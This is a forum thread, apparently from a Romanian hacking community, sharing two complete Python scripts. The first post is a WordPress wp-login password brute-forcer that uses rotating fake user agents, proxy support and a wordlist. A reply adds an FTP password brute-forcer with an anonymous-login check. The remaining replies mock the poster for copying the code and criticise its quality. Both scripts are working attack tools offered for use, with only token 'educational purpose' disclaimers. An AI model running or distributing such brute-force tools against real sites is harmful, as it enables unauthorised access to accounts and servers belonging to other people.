Jump to content
hozarares

Wordpress bruteforcer (python script) 04.08.2010

Recommended Posts

Posted (edited)
001   #!/usr/bin/python 
002 # This is wordpress bruteforcer tools
003 # This was written for educational purpose and pentest only. Use it at your own risk.
004 # Author will not be responsible for any damage !!
005 # Toolname : wpbruteforcer.py
006 # Programmer : gunslinger_
007 # Version : 1.0
008 # Date : Wed Aug 4 13:38:13 WIT 2010
009
010 import re
011 import os
012 import sys
013 import random
014 import warnings
015 import time
016 try:
017 import mechanize
018 except ImportError:
019 print "
[*] Please install mechanize python module first"
020 sys.exit(1)
021 except KeyboardInterrupt:
022 print "\n
[*] Exiting program...\n"
023 sys.exit(1)
024 try:
025 import cookielib
026 except ImportError:
027 print "[*] Please install cookielib python module first"
028 sys.exit(1)
029 except KeyboardInterrupt:
030 print "\n[*] Exiting program...\n"
031 sys.exit(1)
032
033 warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
034
035 # define variable
036 __programmer__ = "gunslinger_ "
037 __version__ = "1.0"
038 verbose = False
039 useproxy = False
040 usepassproxy = False
041 log = 'wpbruteforcer.log'
042 file = open(log, "a")
043 success = 'Dashboard'
044 # some cheating ..
045 ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 046 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
047 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
048 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
049 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
050 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
051 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
052 'Opera/8.00 (Windows NT 5.1; U; en)',
053 'amaya/9.51 libwww/5.4.0',
054 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
055 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
056 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
057 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
058 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 [email]qihoobot@qihoo.net[/email])',
059 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
060 ]
061 wordpress = '''
062 _
063 | |
064 __ _____ _ __ __| |_ __ _ __ ___ ___ ___
065 \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
066 \ V V / (_) | | | (_| | |_) | | | __/\\__ \\__ \\
067 \_/\_/ \\___/|_| \__,_| .__/|_| \\___||___/___/
068 | |
069 |_| bruteforcer...
070
071 Programmer : %s
072 Version : %s''' % (__programmer__, __version__)
073 option = '''
074 Usage : %s [options]
075 Option : -t, --target | Site for bruteforce wp-admin
076 -u, --username | User for bruteforcing
077 -w, --wordlist | Wordlist used for bruteforcing
078 -v, --verbose | Set %s will be verbose (more talkactiveable) 079 -p, --proxy | Set http proxy will be use
080 -k, --usernameproxy | Set username at proxy will be use
081 -i, --passproxy | Set password at proxy will be use
082 -l, --log | Specify output filename (default : fbbruteforcer.log) 083 -h, --help | Print this help
084
085 Example : %s -t target.com -u jack -w wordlist.txt"
086 087 P.S : add "&" to run in the background
088 ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
089 hme = '''
090 Usage : %s [option]
091 -h or --help for get help
092 ''' % sys.argv[0]
093
094 def helpme():
095 print wordpress
096 print option
097 file.write(wordpress)
098 file.write(option)
099 sys.exit(1)
100
101 def helpmee():
102 print wordpress
103 print hme
104 file.write(wordpress)
105 file.write(hme)
106 sys.exit(1)
107
108 for arg in sys.argv:
109 try:
110 if arg.lower() == '-u' or arg.lower() == '--user':
111 username = sys.argv[int(sys.argv[1:].index(arg))+2]
112 if arg.lower() == '-t' or arg.lower() == '--target':
113 target = sys.argv[int(sys.argv[1:].index(arg))+2]
114 if "http://" in target:
115 target = target.replace("http://","")
116 if "www." in target:
117 target = target.replace("www.","")
118 targetsite = "http://www."+target+"/wp-login.php"
119 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
120 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
121 elif arg.lower() == '-l' or arg.lower() == '--log':
122 log = sys.argv[int(sys.argv[1:].index(arg))+2]
123 elif arg.lower() == '-p' or arg.lower() == '--proxy':
124 useproxy = True
125 proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
126 elif arg.lower() == '-k' or arg.lower() == '--userproxy':
127 usepassproxy = True
128 usw = sys.argv[int(sys.argv[1:].index(arg))+2]
129 elif arg.lower() == '-i' or arg.lower() == '--passproxy':
130 usepassproxy = True
131 usp = sys.argv[int(sys.argv[1:].index(arg))+2]
132 elif arg.lower() == '-v' or arg.lower() == '--verbose':
133 verbose = True
134 elif arg.lower() == '-h' or arg.lower() == '--help':
135 helpme()
136 elif len(sys.argv) <= 1:
137 helpmee()
138 except IOError:
139 helpme()
140 except NameError:
141 helpme()
142 except IndexError:
143 helpme()
144
145 def bruteforce(word):
146 try:
147 sys.stdout.write("\r[*] Trying %s... \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t " % word)
148 file.write("[*] Trying %s\n" % word)
149 sys.stdout.flush()
150 br.addheaders = [('User-agent', random.choice(ouruseragent))]
151 opensite = br.open(targetsite)
152 br.select_form(nr=0)
153 br.form['log'] = username
154 br.form['pwd'] = word
155 br.submit()
156 response = br.response().read()
157 if verbose:
158 print response
159 if success in response:
160 print "\n\n[*] Logging in success..."
161 print "[*] Username : %s" % (username)
162 print "[*] Password : %s\n" % (word)
163 file.write("\n[*] Logging in success...")
164 file.write("\n[*] Username : %s" % (username))
165 file.write("\n[*] Password : %s\n\n" % (word))
166 sys.exit(1)
167 except KeyboardInterrupt:
168 print "\n[*] Exiting program...\n"
169 sys.exit(1)
170 except mechanize._mechanize.FormNotFoundError:
171 print "\n[*] Can't launch attack sorry, form is different\n"
172 file.write("\n[*] Can't launch attack sorry, form is different\n")
173 sys.exit(1)
174 except mechanize._form.ControlNotFoundError:
175 print "\n[*] Can't launch attack sorry, form is different\n"
176 file.write("\n[*] Can't launch attack sorry, form is different\n")
177 sys.exit(1)
178
179 def releaser():
180 global word
181 for word in words:
182 bruteforce(word.replace("\n",""))
183
184 def main():
185 global br
186 global words
187 try:
188 br = mechanize.Browser()
189 cj = cookielib.LWPCookieJar()
190 br.set_cookiejar(cj)
191 br.set_handle_equiv(True)
192 br.set_handle_gzip(True)
193 br.set_handle_redirect(True)
194 br.set_handle_referer(True)
195 br.set_handle_robots(False)
196 br.set_debug_http(False)
197 br.set_debug_redirects(False)
198 br.set_debug_redirects(False)
199 br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
200 if useproxy:
201 br.set_proxies({"http": proxy})
202 if usepassproxy:
203 br.add_proxy_password(usw, usp)
204 if verbose:
205 br.set_debug_http(True)
206 br.set_debug_redirects(True)
207 br.set_debug_redirects(True)
208 except KeyboardInterrupt:
209 print "\n[*] Exiting program...\n"
210 file.write("\n[*] Exiting program...\n")
211 sys.exit(1)
212 try:
213 preventstrokes = open(wordlist, "r")
214 words = preventstrokes.readlines()
215 count = 0
216 while count < len(words):
217 words[count] = words[count].strip()
218 count += 1
219 except IOError:
220 print "\n[*] Error: Check your wordlist path\n"
221 file.write("\n[*] Error: Check your wordlist path\n")
222 sys.exit(1)
223 except NameError:
224 helpme()
225 except KeyboardInterrupt:
226 print "\n[*] Exiting program...\n"
227 file.write("\n[*] Exiting program...\n")
228 sys.exit(1)
229 try:
230 print wordpress
231 print "\n[*] Starting attack at %s" % time.strftime("%X")
232 print "[*] Target site : %s" % (targetsite)
233 print "[*] Account for bruteforcing \"%s\"" % (username)
234 print "[*] Loaded :",len(words),"words"
235 print "[*] Bruteforcing wp-login, please wait..."
236 file.write(wordpress)
237 file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
238 file.write("\n[*] Target site : %s" % (targetsite))
239 file.write("\n[*] Account for bruteforcing \"%s\"" % (username))
240 file.write("\n[*] Loaded : %d words" % int(len(words)))
241 file.write("\n[*] Bruteforcing wp-login, please wait...\n")
242 except KeyboardInterrupt:
243 print "\n[*] Exiting program...\n"
244 sys.exit(1)
245 try:
246 releaser()
247 bruteforce(word)
248 except NameError:
249 helpme()
250
251 if __name__ == '__main__':
252 main()

Edited by Nytro
Posted

copy/paste... este de toata jena! dece ai mai postat?

-nu te-ai chinuit sa scrii si tu cateva cuvinte (ai dat doar copy/paste)

-nu ai dat sursa

-nu ai dat credits

merita sa mai zic ceva?

later edit:

ca sa nu mai fac inca un post... am vazut ca ai facut formatting...dar cu restu nu sunt de aceeasi parere cu tine

Posted

Cel mai urat cod care l-am vazut in viata mea ... nu ma refer neaparat ca identarea e = cu 0 si ca sunt numere in fata, dar pur si simplu e scris si strcturat aiurea si dezordonat ... pana si lexx facuse "virusul" ala in php mai lizibil -,-.

Posted

Recunosc acest stil de a programa in Python si de pe luna, gunslinger's style, un FTP bruteforcer tot de el scris:


#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# This is ftp brute force tools [Updated].
# This was written for educational purpose and pentest only. Use it at your own risk.
# Update : More efficient
# : prevent loss added
# : Anonymous checker added
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.5
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk

import sys
import time
import os
from ftplib import FTP

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'

log = "ftpbrute.log"

face = '''
.___ .__ .__ _______ .___
__| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __
/ __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ /
/ /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ /
\____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/
\/ \/ \/ \/ \/ \/ \/ \/ \/
http://www.devilzc0de.com
by : gunslinger_
ftpbrute.py version 1.0
Brute forcing ftp target
Programmmer : gunslinger_
gunslinger[at]devilzc0de[dot]com
_____________________________________________________________________________________________________________________________________________
'''

option = '''
Usage: ./ftpbrute.py [options]
Options: -t, --target <hostname/ip> | Target to bruteforcing
-u, --user <user> | User for bruteforcing
-w, --wordlist <filename> | Wordlist used for bruteforcing
-h, --help <help> | print this help

Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt

'''

file = open(log, "a")

def MyFace() :
os.system(SysCls)
print face
file.write(face)


def HelpMe() :
MyFace()
print option
file.write(option)
sys.exit(1)

for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
HelpMe()
elif len(sys.argv) <= 1:
HelpMe()

def checkanony() :
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(hostname)
ftp.login()
ftp.retrlines('LIST')
print "\n[!] Anonymous login successfuly !\n"
ftp.quit()
except Exception, e:
print "\n[-] Anonymous login unsuccessful...\n"
pass



def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ",user, ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)

MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
checkanony()

try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
BruteForce(word.replace("\n",""))

file.close()

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...